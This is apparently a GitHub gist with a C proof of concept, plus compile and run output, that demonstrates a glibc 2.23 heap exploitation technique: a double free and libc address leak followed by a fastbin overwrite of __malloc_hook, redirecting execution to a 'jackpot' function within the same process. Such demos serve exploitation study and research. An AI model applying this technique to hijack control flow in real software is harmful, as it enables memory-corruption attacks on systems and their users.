overwrite malloc_hook by fastbins unlink attack
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
void jackpot() { puts("jackpot!"); } | |
int main() | |
{ | |
puts("[+] allocate p1, p2"); | |
char *p1 = malloc(0x100); | |
char *p2 = malloc(0x100); | |
printf("p1 = %p\n", p1); | |
printf("p2 = %p\n", p2); | |
puts("\n[+] free p1, p2"); | |
free(p1); | |
free(p2); | |
puts("\n[+] allocate p3"); | |
char *p3 = malloc(0x100); | |
printf("p3 = %p\n", p3); | |
puts("\n[+] p1 double free"); | |
free(p1); | |
puts("\n[+] leak libc address via p3"); | |
void *arena_top = *(void **)p3; | |
void *malloc_hook = arena_top - 0x68; | |
printf("arena_top = %p\n", arena_top); | |
printf("malloc_hook = %p\n", malloc_hook); | |
puts("\n[+] allocate p4"); | |
char *p4 = malloc(0x100); | |
printf("p4 = %p\n", p4); | |
puts("\n[+] allocate p5 with size 0x60"); | |
char *p5 = malloc(0x60); | |
printf("p5 = %p\n", p5); | |
puts("\n[+] free p5"); | |
free(p5); | |
puts("\n[+] abuse p4 overflow"); | |
memset(p4, 'A', 0x100); | |
*(void **)(p4+0x108) = 0x71; | |
*(void **)(p4+0x110) = (void *)malloc_hook-0x20-3; | |
puts("\n[+] allocate p6, p7 with size 0x60"); | |
char *p6 = malloc(0x60); | |
char *p7 = malloc(0x60); | |
printf("p6 = %p\n", p6); | |
printf("p7 = %p\n", p7); | |
puts("\n[+] overwrite *(p7+0x13) = malloc_hook"); | |
memset(p7, 'A', 0x13); | |
*(void **)(p7+0x13) = jackpot; | |
puts("\n[+] allocate p8"); | |
char *p8 = malloc(0x100); | |
printf("p8 = %p\n", p8); | |
return 0; | |
} |
$ gcc fastbins_malloc_hook.c -o fastbins_malloc_hook | |
fastbins_malloc_hook.c: In function ‘main’: | |
fastbins_malloc_hook.c:45:26: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
*(void **)(p4+0x108) = 0x71; | |
^ | |
$ ./fastbins_malloc_hook | |
[+] allocate p1, p2 | |
p1 = 0xd36420 | |
p2 = 0xd36530 | |
[+] free p1, p2 | |
[+] allocate p3 | |
p3 = 0xd36420 | |
[+] p1 double free | |
[+] leak libc address via p3 | |
arena_top = 0x7f30e669eb78 | |
malloc_hook = 0x7f30e669eb10 | |
[+] allocate p4 | |
p4 = 0xd36420 | |
[+] allocate p5 with size 0x60 | |
p5 = 0xd36530 | |
[+] free p5 | |
[+] abuse p4 overflow | |
[+] allocate p6, p7 with size 0x60 | |
p6 = 0xd36530 | |
p7 = 0x7f30e669eafd | |
[+] overwrite *(p7+0x13) = malloc_hook | |
[+] allocate p8 | |
jackpot! | |
p8 = 0x9 | |
$ /lib/x86_64-linux-gnu/libc.so.6 | |
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al. | |
Copyright (C) 2016 Free Software Foundation, Inc. | |
This is free software; see the source for copying conditions. | |
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A | |
PARTICULAR PURPOSE. | |
Compiled by GNU CC version 5.3.1 20160413. | |
Available extensions: | |
crypt add-on version 2.1 by Michael Glad and others | |
GNU Libidn by Simon Josefsson | |
Native POSIX Threads Library by Ulrich Drepper et al | |
BIND-8.2.3-T5B | |
libc ABIs: UNIQUE IFUNC | |
For bug reporting instructions, please see: | |
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment